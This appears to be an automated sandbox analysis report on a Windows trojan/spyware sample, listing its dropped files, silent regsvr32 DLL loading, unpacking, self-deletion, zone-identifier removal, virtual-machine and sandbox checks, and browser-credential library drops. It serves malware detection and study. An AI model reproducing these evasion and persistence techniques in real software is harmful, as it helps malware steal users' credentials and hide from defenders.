Source: C:\Users\user\Desktop\hOdgEiePTe.exe	Code function: 0_2_004167D0	0_2_004167D0
Source: C:\Users\user\AppData\Roaming\hcthhbi	Code function: 13_2_004159F0	13_2_004159F0
Source: C:\Users\user\AppData\Roaming\hcthhbi	Code function: 13_2_004167D0	13_2_004167D0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 27_2_049B4EC0	27_2_049B4EC0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 27_2_049B4338	27_2_049B4338
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 27_2_049B1111	27_2_049B1111
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 27_2_049B55F0	27_2_049B55F0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 27_2_049B2340	27_2_049B2340
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 27_2_049B2C00	27_2_049B2C00
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 27_2_049B2564	27_2_049B2564
Source: C:\Users\user\AppData\Local\Temp\7791.exe	Code function: 29_2_027AEB48	29_2_027AEB48
Source: C:\Users\user\AppData\Local\Temp\7791.exe	Code function: 29_2_027C39C7	29_2_027C39C7
Source: C:\Users\user\AppData\Local\Temp\7791.exe	Code function: 29_2_0279862E	29_2_0279862E
Source: C:\Users\user\AppData\Local\Temp\7791.exe	Code function: 29_2_027BC749	29_2_027BC749
Source: C:\Users\user\AppData\Local\Temp\7791.exe	Code function: 29_2_027C2F25	29_2_027C2F25
Source: C:\Users\user\AppData\Local\Temp\7791.exe	Code function: 29_2_027ADF9D	29_2_027ADF9D
Source: C:\Users\user\AppData\Local\Temp\7791.exe	Code function: 29_2_027C3476	29_2_027C3476
Source: C:\Users\user\AppData\Local\Temp\7791.exe	Code function: 29_2_02797C93	29_2_02797C93
Source: C:\Users\user\AppData\Local\Temp\7791.exe	Code function: 29_2_027B0DE7	29_2_027B0DE7
Source: C:\Users\user\AppData\Local\Temp\7791.exe	Code function: 29_2_027ABDDA	29_2_027ABDDA
Source: C:\Users\user\AppData\Local\Temp\7791.exe	Code function: 29_2_027C4DDB	29_2_027C4DDB

Source: C:\Users\user\Desktop\hOdgEiePTe.exe	Code function: String function: 00413320 appears 32 times
Source: C:\Users\user\AppData\Local\Temp\7791.exe	Code function: String function: 027B2B4C appears 36 times
Source: C:\Users\user\AppData\Local\Temp\7791.exe	Code function: String function: 027B8AD7 appears 39 times
Source: C:\Users\user\AppData\Local\Temp\7791.exe	Code function: String function: 027B2BB5 appears 32 times
Source: C:\Users\user\AppData\Roaming\hcthhbi	Code function: String function: 00413320 appears 32 times

Source: C:\Users\user\Desktop\hOdgEiePTe.exe	Code function: 0_2_004017E3 Sleep,NtTerminateProcess,	0_2_004017E3
Source: C:\Users\user\Desktop\hOdgEiePTe.exe	Code function: 0_2_00402351 NtOpenKey,NtEnumerateKey,NtEnumerateKey,	0_2_00402351
Source: C:\Users\user\Desktop\hOdgEiePTe.exe	Code function: 0_2_00402072 NtQuerySystemInformation,	0_2_00402072
Source: C:\Users\user\Desktop\hOdgEiePTe.exe	Code function: 0_2_00401807 Sleep,NtTerminateProcess,	0_2_00401807
Source: C:\Users\user\Desktop\hOdgEiePTe.exe	Code function: 0_2_004014DF NtMapViewOfSection,NtMapViewOfSection,NtMapViewOfSection,NtMapViewOfSection,	0_2_004014DF
Source: C:\Users\user\Desktop\hOdgEiePTe.exe	Code function: 0_2_004017E2 Sleep,NtTerminateProcess,	0_2_004017E2
Source: C:\Users\user\Desktop\hOdgEiePTe.exe	Code function: 0_2_004017EE Sleep,NtTerminateProcess,	0_2_004017EE
Source: C:\Users\user\Desktop\hOdgEiePTe.exe	Code function: 0_2_00401EFD NtQuerySystemInformation,	0_2_00401EFD
Source: C:\Users\user\AppData\Roaming\hcthhbi	Code function: 13_2_004017E3 Sleep,NtTerminateProcess,	13_2_004017E3
Source: C:\Users\user\AppData\Roaming\hcthhbi	Code function: 13_2_00402351 NtOpenKey,NtEnumerateKey,NtEnumerateKey,	13_2_00402351
Source: C:\Users\user\AppData\Roaming\hcthhbi	Code function: 13_2_00402072 NtQuerySystemInformation,	13_2_00402072
Source: C:\Users\user\AppData\Roaming\hcthhbi	Code function: 13_2_00401807 Sleep,NtTerminateProcess,	13_2_00401807
Source: C:\Users\user\AppData\Roaming\hcthhbi	Code function: 13_2_004014DF NtMapViewOfSection,NtMapViewOfSection,NtMapViewOfSection,NtMapViewOfSection,	13_2_004014DF
Source: C:\Users\user\AppData\Roaming\hcthhbi	Code function: 13_2_004017E2 Sleep,NtTerminateProcess,	13_2_004017E2
Source: C:\Users\user\AppData\Roaming\hcthhbi	Code function: 13_2_004017EE Sleep,NtTerminateProcess,	13_2_004017EE
Source: C:\Users\user\AppData\Roaming\hcthhbi	Code function: 13_2_00401EFD NtQuerySystemInformation,	13_2_00401EFD

Source: hOdgEiePTe.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: hOdgEiePTe.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: hOdgEiePTe.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: hOdgEiePTe.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: hcthhbi.2.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: hcthhbi.2.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: hcthhbi.2.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: hcthhbi.2.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: C:\Windows\explorer.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: sfc.dll	Jump to behavior

Source: 5D03.dll.2.dr

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 5D03.dll.2.dr

Static PE information: Section: .crt ZLIB complexity 0.9964098808092948

Source: hOdgEiePTe.exe	Virustotal: Detection: 59%
Source: hOdgEiePTe.exe	Metadefender: Detection: 37%
Source: hOdgEiePTe.exe	ReversingLabs: Detection: 80%

Source: hOdgEiePTe.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\hOdgEiePTe.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\hOdgEiePTe.exe "C:\Users\user\Desktop\hOdgEiePTe.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\hcthhbi C:\Users\user\AppData\Roaming\hcthhbi
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\900B.exe C:\Users\user\AppData\Local\Temp\900B.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\regsvr32.exe regsvr32 /s C:\Users\user\AppData\Local\Temp\5D03.dll
Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe /s C:\Users\user\AppData\Local\Temp\5D03.dll
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\7791.exe C:\Users\user\AppData\Local\Temp\7791.exe
Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe /s C:\Users\user\AppData\Local\Temp\5D03.dll	Jump to behavior

Source: C:\Windows\explorer.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32

Jump to behavior

Source: C:\Windows\explorer.exe

File created: C:\Users\user\AppData\Roaming\hcthhbi

Jump to behavior

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@7/17@20/9

Source: softokn3.dll.29.dr	Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
Source: nss3.dll.29.dr	Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: softokn3.dll.29.dr	Binary or memory string: SELECT ALL %s FROM %s WHERE id=$ID;
Source: softokn3.dll.29.dr	Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: nss3.dll.29.dr	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: nss3.dll.29.dr	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: nss3.dll.29.dr	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: softokn3.dll.29.dr	Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: softokn3.dll.29.dr	Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: softokn3.dll.29.dr	Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: softokn3.dll.29.dr	Binary or memory string: SELECT ALL id FROM %s;
Source: softokn3.dll.29.dr	Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: softokn3.dll.29.dr	Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: nss3.dll.29.dr	Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: nss3.dll.29.dr	Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: nss3.dll.29.dr	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: nss3.dll.29.dr	Binary or memory string: CREATE TABLE xx( name TEXT, /* Name of table or index / path TEXT, / Path to page from root / pageno INTEGER, / Page number / pagetype TEXT, / 'internal', 'leaf' or 'overflow' / ncell INTEGER, / Cells on page (0 for overflow) / payload INTEGER, / Bytes of payload on this page / unused INTEGER, / Bytes of unused space on this page / mx_payload INTEGER, / Largest payload size of all cells / pgoffset INTEGER, / Offset of page in file / pgsize INTEGER, / Size of the page / schema TEXT HIDDEN / Database schema being analyzed */);
Source: nss3.dll.29.dr	Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: softokn3.dll.29.dr	Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
Source: nss3.dll.29.dr	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);docid INTEGER PRIMARY KEY%z, 'c%d%q'%z, langidCREATE TABLE %Q.'%q_content'(%s)CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);m
Source: nss3.dll.29.dr	Binary or memory string: CREATE TABLE xx( name TEXT, /* Name of table or index / path TEXT, / Path to page from root / pageno INTEGER, / Page number / pagetype TEXT, / 'internal', 'leaf' or 'overflow' / ncell INTEGER, / Cells on page (0 for overflow) / payload INTEGER, / Bytes of payload on this page / unused INTEGER, / Bytes of unused space on this page / mx_payload INTEGER, / Largest payload size of all cells / pgoffset INTEGER, / Offset of page in file / pgsize INTEGER, / Size of the page / schema TEXT HIDDEN / Database schema being analyzed */);/overflow%s%.3x+%.6x%s%.3x/internalleafcorruptedno such schema: %sSELECT 'sqlite_master' AS name, 1 AS rootpage, 'table' AS type UNION ALL SELECT name, rootpage, type FROM "%w".%s WHERE rootpage!=0 ORDER BY namedbstat2018-01-22 18:45:57 0c55d179733b46d8d0ba4d88e01a25e10677046ee3da1d5b1581e86726f2171d:

Source: C:\Users\user\Desktop\hOdgEiePTe.exe

Code function: 0_2_007864F7 CreateToolhelp32Snapshot,Module32First,

0_2_007864F7

Source: C:\Users\user\AppData\Local\Temp\7791.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7791.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: C:\Users\user\Desktop\hOdgEiePTe.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source: hOdgEiePTe.exe

Static PE information: More than 200 imports for KERNEL32.dll

Source: hOdgEiePTe.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: z:\task_1542148442\build\src\obj-thunderbird\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb source: 7791.exe, 0000001D.00000003.522252354.00000000278D1000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.29.dr
Source:	Binary string: z:\task_1542148442\build\src\obj-thunderbird\security\nss\lib\freebl\freebl_freebl3\freebl3.pdbZZ source: 7791.exe, 0000001D.00000003.526885473.00000000278D1000.00000004.00000800.00020000.00000000.sdmp, freebl3.dll.29.dr
Source:	Binary string: C:\tezerevi\goxepupinob\cibuz.pdb source: efthhbi.2.dr, 900B.exe.2.dr
Source:	Binary string: vcruntime140.i386.pdb source: vcruntime140.dll.29.dr
Source:	Binary string: vcruntime140.i386.pdbGCTL source: vcruntime140.dll.29.dr
Source:	Binary string: msvcp140.i386.pdbGCTL source: msvcp140.dll.29.dr
Source:	Binary string: z:\task_1542148442\build\src\obj-thunderbird\mozglue\build\mozglue.pdb source: 7791.exe, 0000001D.00000003.525539795.00000000278D1000.00000004.00000800.00020000.00000000.sdmp, mozglue.dll.29.dr
Source:	Binary string: JC:\vizujibuvu\gagaworavifiro\kivu\98-yodelatepi\piyon.pdb source: 7791.exe.2.dr
Source:	Binary string: z:\task_1542148442\build\src\obj-thunderbird\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb)) source: 7791.exe, 0000001D.00000003.522252354.00000000278D1000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.29.dr
Source:	Binary string: z:\task_1542148442\build\src\obj-thunderbird\mozglue\build\mozglue.pdb22! source: 7791.exe, 0000001D.00000003.525539795.00000000278D1000.00000004.00000800.00020000.00000000.sdmp, mozglue.dll.29.dr
Source:	Binary string: C:\vizujibuvu\gagaworavifiro\kivu\98-yodelatepi\piyon.pdb source: 7791.exe.2.dr
Source:	Binary string: C:\fusiki13\yurijekal59\tusezox99\racibog.pdb source: hOdgEiePTe.exe, hcthhbi.2.dr
Source:	Binary string: KC:\tezerevi\goxepupinob\cibuz.pdbX source: efthhbi.2.dr, 900B.exe.2.dr
Source:	Binary string: dPfxMaQ.pdb source: 5D03.dll.2.dr
Source:	Binary string: .+C:\fusiki13\yurijekal59\tusezox99\racibog.pdb source: hOdgEiePTe.exe, hcthhbi.2.dr
Source:	Binary string: msvcp140.i386.pdb source: msvcp140.dll.29.dr
Source:	Binary string: z:\task_1542148442\build\src\obj-thunderbird\security\nss3.pdb source: nss3.dll.29.dr
Source:	Binary string: z:\task_1542148442\build\src\obj-thunderbird\security\nss\lib\freebl\freebl_freebl3\freebl3.pdb source: 7791.exe, 0000001D.00000003.526885473.00000000278D1000.00000004.00000800.00020000.00000000.sdmp, freebl3.dll.29.dr

Data Obfuscation

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\AppData\Local\Temp\7791.exe

Unpacked PE file: 29.2.7791.exe.400000.0.unpack

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\hOdgEiePTe.exe	Unpacked PE file: 0.2.hOdgEiePTe.exe.400000.0.unpack .text:ER;.data:W;.tixuz:W;.luka:W;.mavaf:W;.rsrc:R; vs .text:EW;
Source: C:\Users\user\AppData\Roaming\hcthhbi	Unpacked PE file: 13.2.hcthhbi.400000.0.unpack .text:ER;.data:W;.tixuz:W;.luka:W;.mavaf:W;.rsrc:R; vs .text:EW;
Source: C:\Users\user\AppData\Local\Temp\7791.exe	Unpacked PE file: 29.2.7791.exe.400000.0.unpack .text:ER;.data:W;.hususe:W;.lutoluh:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;

Source: C:\Users\user\Desktop\hOdgEiePTe.exe	Code function: 0_2_00402847 push ebp; ret	0_2_00402848
Source: C:\Users\user\Desktop\hOdgEiePTe.exe	Code function: 0_2_00402E56 push eax; ret	0_2_00402EBF
Source: C:\Users\user\Desktop\hOdgEiePTe.exe	Code function: 0_2_00402E5E push eax; ret	0_2_00402EBF
Source: C:\Users\user\Desktop\hOdgEiePTe.exe	Code function: 0_2_00402E6A push eax; ret	0_2_00402EBF
Source: C:\Users\user\Desktop\hOdgEiePTe.exe	Code function: 0_2_00402E70 push eax; ret	0_2_00402EBF
Source: C:\Users\user\Desktop\hOdgEiePTe.exe	Code function: 0_2_00402E05 push eax; ret	0_2_00402EBF
Source: C:\Users\user\Desktop\hOdgEiePTe.exe	Code function: 0_2_00402E1F push eax; ret	0_2_00402EBF
Source: C:\Users\user\Desktop\hOdgEiePTe.exe	Code function: 0_2_00402E88 push eax; ret	0_2_00402EBF
Source: C:\Users\user\Desktop\hOdgEiePTe.exe	Code function: 0_2_00402E8F push eax; ret	0_2_00402EBF
Source: C:\Users\user\Desktop\hOdgEiePTe.exe	Code function: 0_2_00402E96 push eax; ret	0_2_00402EBF
Source: C:\Users\user\Desktop\hOdgEiePTe.exe	Code function: 0_2_00402EA4 push eax; ret	0_2_00402EBF
Source: C:\Users\user\Desktop\hOdgEiePTe.exe	Code function: 0_2_00401AAC push edi; iretd	0_2_00401AAD
Source: C:\Users\user\Desktop\hOdgEiePTe.exe	Code function: 0_2_00402DB7 push eax; ret	0_2_00402EBF
Source: C:\Users\user\Desktop\hOdgEiePTe.exe	Code function: 0_2_0078BE5A push esi; retf	0_2_0078BE5B
Source: C:\Users\user\Desktop\hOdgEiePTe.exe	Code function: 0_2_0078BE1B push edx; ret	0_2_0078BE26
Source: C:\Users\user\Desktop\hOdgEiePTe.exe	Code function: 0_2_0078BE80 push edx; retf	0_2_0078BE82
Source: C:\Users\user\Desktop\hOdgEiePTe.exe	Code function: 0_2_0078871C push eax; ret	0_2_00788724
Source: C:\Users\user\Desktop\hOdgEiePTe.exe	Code function: 0_2_0078BDC3 push edx; ret	0_2_0078BE26
Source: C:\Users\user\AppData\Roaming\hcthhbi	Code function: 13_2_00402847 push ebp; ret	13_2_00402848
Source: C:\Users\user\AppData\Roaming\hcthhbi	Code function: 13_2_00402E56 push eax; ret	13_2_00402EBF
Source: C:\Users\user\AppData\Roaming\hcthhbi	Code function: 13_2_00402E5E push eax; ret	13_2_00402EBF
Source: C:\Users\user\AppData\Roaming\hcthhbi	Code function: 13_2_00402E6A push eax; ret	13_2_00402EBF
Source: C:\Users\user\AppData\Roaming\hcthhbi	Code function: 13_2_00402E70 push eax; ret	13_2_00402EBF
Source: C:\Users\user\AppData\Roaming\hcthhbi	Code function: 13_2_00402E05 push eax; ret	13_2_00402EBF
Source: C:\Users\user\AppData\Roaming\hcthhbi	Code function: 13_2_00402E1F push eax; ret	13_2_00402EBF
Source: C:\Users\user\AppData\Roaming\hcthhbi	Code function: 13_2_00402E88 push eax; ret	13_2_00402EBF
Source: C:\Users\user\AppData\Roaming\hcthhbi	Code function: 13_2_00402E8F push eax; ret	13_2_00402EBF
Source: C:\Users\user\AppData\Roaming\hcthhbi	Code function: 13_2_00402E96 push eax; ret	13_2_00402EBF
Source: C:\Users\user\AppData\Roaming\hcthhbi	Code function: 13_2_00402EA4 push eax; ret	13_2_00402EBF
Source: C:\Users\user\AppData\Roaming\hcthhbi	Code function: 13_2_00401AAC push edi; iretd	13_2_00401AAD
Source: C:\Users\user\AppData\Roaming\hcthhbi	Code function: 13_2_00402DB7 push eax; ret	13_2_00402EBF

Source: hOdgEiePTe.exe	Static PE information: section name: .tixuz
Source: hOdgEiePTe.exe	Static PE information: section name: .luka
Source: hOdgEiePTe.exe	Static PE information: section name: .mavaf
Source: 900B.exe.2.dr	Static PE information: section name: .kulo
Source: 900B.exe.2.dr	Static PE information: section name: .lisik
Source: 7791.exe.2.dr	Static PE information: section name: .hususe
Source: 7791.exe.2.dr	Static PE information: section name: .lutoluh
Source: hcthhbi.2.dr	Static PE information: section name: .tixuz
Source: hcthhbi.2.dr	Static PE information: section name: .luka
Source: hcthhbi.2.dr	Static PE information: section name: .mavaf
Source: efthhbi.2.dr	Static PE information: section name: .kulo
Source: efthhbi.2.dr	Static PE information: section name: .lisik
Source: msvcp140.dll.29.dr	Static PE information: section name: .didat
Source: mozglue.dll.29.dr	Static PE information: section name: .didat

Source: C:\Windows\explorer.exe

Process created: C:\Windows\System32\regsvr32.exe regsvr32 /s C:\Users\user\AppData\Local\Temp\5D03.dll

Source: initial sample

Static PE information: section name: .text entropy: 7.984754713961286

Source: C:\Users\user\AppData\Local\Temp\7791.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7791.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7791.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7791.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7791.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7791.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file

Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Roaming\hcthhbi			Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Roaming\efthhbi			Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\7791.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7791.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Roaming\efthhbi	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\5D03.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7791.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\7791.exe	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\900B.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7791.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7791.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7791.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Roaming\hcthhbi	Jump to dropped file

Hooking and other Techniques for Hiding and Protection

Deletes itself after installation

Source: C:\Windows\explorer.exe

File deleted: c:\users\user\desktop\hodgeiepte.exe

Jump to behavior

Hides that the sample has been downloaded from the Internet (zone.identifier)

Source: C:\Windows\explorer.exe

File opened: C:\Users\user\AppData\Roaming\hcthhbi:Zone.Identifier read attributes | delete

Jump to behavior

Malware Analysis System Evasion

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: hOdgEiePTe.exe, 00000000.00000002.335564191.0000000000792000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: ASWHOOK

Checks if the current machine is a virtual machine (disk enumeration)

Source: C:\Users\user\Desktop\hOdgEiePTe.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\hOdgEiePTe.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\hOdgEiePTe.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\hOdgEiePTe.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\hOdgEiePTe.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\hOdgEiePTe.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hcthhbi	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hcthhbi	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hcthhbi	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hcthhbi	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hcthhbi	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hcthhbi	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\900B.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\900B.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\900B.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\900B.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\900B.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\900B.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior

Source: C:\Windows\explorer.exe TID: 6960	Thread sleep count: 581 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 6968	Thread sleep count: 369 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 6968	Thread sleep time: -36900s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 6964	Thread sleep count: 325 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 6964	Thread sleep time: -32500s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 6344	Thread sleep count: 285 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 6340	Thread sleep count: 456 > 30	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\7791.exe	Dropped PE file which has not been started: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7791.exe	Dropped PE file which has not been started: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7791.exe	Dropped PE file which has not been started: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7791.exe	Dropped PE file which has not been started: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7791.exe	Dropped PE file which has not been started: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7791.exe	Dropped PE file which has not been started: C:\ProgramData\softokn3.dll	Jump to dropped file

Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 581	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 369	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 456	Jump to behavior

Source: C:\Users\user\Desktop\hOdgEiePTe.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\hOdgEiePTe.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\7791.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\html\	Jump to behavior
